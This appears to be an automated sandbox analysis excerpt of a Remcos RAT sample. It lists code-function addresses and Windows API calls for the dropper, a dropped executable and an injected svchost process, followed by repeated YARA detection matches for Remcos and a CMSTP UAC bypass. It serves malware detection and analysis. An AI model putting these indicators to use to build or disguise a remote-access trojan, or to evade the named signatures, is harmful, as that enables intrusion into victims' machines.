                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00398310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00398310
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003A51BD
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B551BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00B551BD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_004167EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_004167EF
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0034E6A00_2_0034E6A0
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0036D9750_2_0036D975
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0034FCE00_2_0034FCE0
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003621C50_2_003621C5
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003762D20_2_003762D2
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003C03DA0_2_003C03DA
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0037242E0_2_0037242E
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003625FA0_2_003625FA
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0039E6160_2_0039E616
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003566E10_2_003566E1
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0037878F0_2_0037878F
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003588080_2_00358808
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003C08570_2_003C0857
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003768440_2_00376844
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A88890_2_003A8889
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0036CB210_2_0036CB21
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00376DB60_2_00376DB6
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00356F9E0_2_00356F9E
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003530300_2_00353030
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003631870_2_00363187
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0036F1D90_2_0036F1D9
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003412870_2_00341287
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003614840_2_00361484
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003555200_2_00355520
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003676960_2_00367696
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003557600_2_00355760
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003619780_2_00361978
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00379AB50_2_00379AB5
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0036BDA60_2_0036BDA6
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00361D900_2_00361D90
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003C7DDB0_2_003C7DDB
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0034DF000_2_0034DF00
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00353FE00_2_00353FE0
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_016976800_2_01697680
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00AFE6A02_2_00AFE6A0
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B1D9752_2_00B1D975
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00AFFCE02_2_00AFFCE0
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B121C52_2_00B121C5
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B262D22_2_00B262D2
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B703DA2_2_00B703DA
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B2242E2_2_00B2242E
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B125FA2_2_00B125FA
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B066E12_2_00B066E1
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B4E6162_2_00B4E616
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B2878F2_2_00B2878F
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B588892_2_00B58889
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B088082_2_00B08808
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B708572_2_00B70857
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B268442_2_00B26844
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B1CB212_2_00B1CB21
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B26DB62_2_00B26DB6
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B06F9E2_2_00B06F9E
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B030302_2_00B03030
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B131872_2_00B13187
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B1F1D92_2_00B1F1D9
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00AF12872_2_00AF1287
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B114842_2_00B11484
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B055202_2_00B05520
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B176962_2_00B17696
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B057602_2_00B05760
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B119782_2_00B11978
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B29AB52_2_00B29AB5
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B1BDA62_2_00B1BDA6
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B11D902_2_00B11D90
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B77DDB2_2_00B77DDB
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B03FE02_2_00B03FE0
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00AFDF002_2_00AFDF00
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_011889282_2_01188928
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0043706A3_2_0043706A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004140053_2_00414005
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0043E11C3_2_0043E11C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004541D93_2_004541D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004381E83_2_004381E8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041F18B3_2_0041F18B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004462703_2_00446270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0043E34B3_2_0043E34B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004533AB3_2_004533AB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042742E3_2_0042742E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004375663_2_00437566
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0043E5A83_2_0043E5A8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004387F03_2_004387F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0043797E3_2_0043797E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004339D73_2_004339D7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0044DA493_2_0044DA49
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00427AD73_2_00427AD7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041DBF33_2_0041DBF3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00427C403_2_00427C40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00437DB33_2_00437DB3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00435EEB3_2_00435EEB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0043DEED3_2_0043DEED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00426E9F3_2_00426E9F
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD27204_2_02FD2720
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 7_2_012BA2707_2_012BA270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0043706A8_2_0043706A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004140058_2_00414005
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0043E11C8_2_0043E11C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004541D98_2_004541D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004381E88_2_004381E8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041F18B8_2_0041F18B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004462708_2_00446270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0043E34B8_2_0043E34B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004533AB8_2_004533AB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042742E8_2_0042742E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004375668_2_00437566
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0043E5A88_2_0043E5A8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004387F08_2_004387F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0043797E8_2_0043797E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004339D78_2_004339D7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0044DA498_2_0044DA49
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00427AD78_2_00427AD7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041DBF38_2_0041DBF3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00427C408_2_00427C40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00437DB38_2_00437DB3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00435EEB8_2_00435EEB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0043DEED8_2_0043DEED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00426E9F8_2_00426E9F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00402213 appears 38 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004052FD appears 32 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040417E appears 46 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00402093 appears 100 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00401E65 appears 68 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434E70 appears 108 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00401FAB appears 38 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004020DF appears 40 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434801 appears 82 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00457AA8 appears 34 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00445951 appears 56 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0044854A appears 36 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00411FA2 appears 32 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004046F7 appears 34 times
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: String function: 00AF7DE1 appears 36 times
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: String function: 00B18900 appears 42 times
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: String function: 00B10AE3 appears 70 times
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: String function: 00360AE3 appears 70 times
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: String function: 00347DE1 appears 35 times
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: String function: 00368900 appears 42 times
                  Source: OKkUGRkZV7.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
